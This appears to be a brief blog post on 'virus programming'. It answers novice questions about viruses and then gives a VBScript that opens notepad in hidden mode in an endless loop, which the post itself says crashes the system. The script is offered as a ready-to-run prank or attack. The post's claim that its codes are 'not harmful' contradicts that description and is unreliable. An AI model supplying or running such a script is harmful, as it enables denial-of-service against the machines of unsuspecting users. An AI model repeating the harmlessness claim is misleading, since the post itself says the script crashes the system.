Virus Programming

Note:

We are preparing the list of codes which is not harmful for the internet users ....although they are viruses but they are not harmful.

But it is sincerley advised that not to making as your profession because it may follow many unauthorised disturbance in your life.

Most asked question are:



What is a Virus? 


How to make it?


which language is used to make a virus? 


how can we define the limit of virus?


so the answer is 


Virus is a computer programme which is especially made for its own purposes. i.e user defined purposes each virus are for different purposes. Virus takes the unaccess control of some processes of your OS even before you come to know or may can install backdoors in your system.


Making a virus is not a big task , to do so firstly you had to be a good programmer and secondly you should know what is the purpose of the virus you are making.


Languages are not determined that depends on programmers which language they use.
eg: C,C++.
But it is better to write a scrip using some scripting language to make a virus.
eg: bash, perl, python.

===========================================================

Open notepad type the following and save it as anyname.vbs
============================================================
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop

============================================================
This program will infinitely open notepad in hidden mode causing your
system to crash...!
the value "0" in the third line specifies the mode in which the application
should run here it is hidden mode.
==========================================================










Comments